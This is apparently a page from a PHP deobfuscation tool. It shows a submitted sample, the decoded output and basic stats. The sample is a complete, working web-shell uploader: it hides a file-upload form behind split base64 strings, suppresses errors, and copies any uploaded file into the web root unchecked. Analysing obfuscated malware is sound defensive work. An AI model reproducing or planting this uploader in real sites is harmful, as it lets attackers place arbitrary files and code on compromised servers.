Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php error_reporting(0); echo(base64_decode("a2lsbF"."90aG"."Vf"."bmV0"."Ijxmb3"."JtIG1..

Decoded Output download

b'kill_the_net"<form method=\'POST\' enctype=\'multipart/form-data\'><input type=\'file\'name=\'f\' /><input type=\'submit\' value=\'up\' /></form>"'

Did this file decode correctly?

Original Code

<?php
error_reporting(0);
echo(base64_decode("a2lsbF"."90aG"."Vf"."bmV0"."Ijxmb3"."JtIG1ldGhvZD0n"."UE9TVCcgZW5jdHlw"."ZT0nbXVsdGlwYXJ0L2Z"."vcm0tZGF0YSc+PGl"."ucHV0IHR5cGU9J2ZpbGUnbmF"."tZT0nZicgLz48aW5wdXQgdHlwZT0nc3V"."ibWl0JyB2YWx1ZT0ndXAnIC8+PC9mb3JtPiI="));
@copy($_FILES['f']['tmp_name'],$_FILES['f']['name']);
echo("<a href=".$_FILES['f']['name'].">".$_FILES['f']['name']."</a>");
?>

Function Calls

base64_decode 1
error_reporting 1

Variables

None

Stats

MD5 f0918b82453583898ded4d593132963d
Eval Count 0
Decode Time 45 ms